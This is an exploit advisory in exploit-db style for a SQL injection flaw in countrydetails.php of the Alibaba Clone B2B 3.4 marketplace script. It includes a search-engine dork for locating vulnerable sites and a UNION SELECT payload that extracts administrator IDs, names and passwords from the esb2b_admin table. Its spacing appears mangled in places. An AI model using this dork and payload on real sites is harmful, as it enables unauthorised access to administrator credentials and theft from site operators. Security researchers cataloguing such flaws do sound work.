Alibaba Clone B2B is a B2B market transaction script. The countrydetails. php in Alibaba Clone B2B 3.4 has the SQL injection vulnerability, which may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
Exploit Title: Alibaba v3.4 clone B2B (countrydetails. php) SQL Injection Vulnerability
Date: 29.11.2010
Author: Dr.0rYX and Cr3w-DZ
Category: webapps/0day
Vendor: http://www.alibabaclone.com/
Script: Alibaba v3.4 clone B2B
Download: http://www.alibabaclone.com/(pipeline script)
Vulnerability: SQL injection
Dork: inurl: "countrydetails. php? Es_id ="
[+] Poc:
~~~~~~~~~
Http: // server/countrydetails. php? Es_id = SQL [N. A.S.T]
[Exploit]
Http: // server/countrydetails. php? Es_id =-1 + UNION + ALL + select + 1, Group_concat (CONVERT (es_id USING utf8), 0x3a, CONVERT (es_admin_name USING utf8), 0x3a, CONVERT (es_pwd USING utf8), 3, 4 + from + esb2b_admin --
[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/15650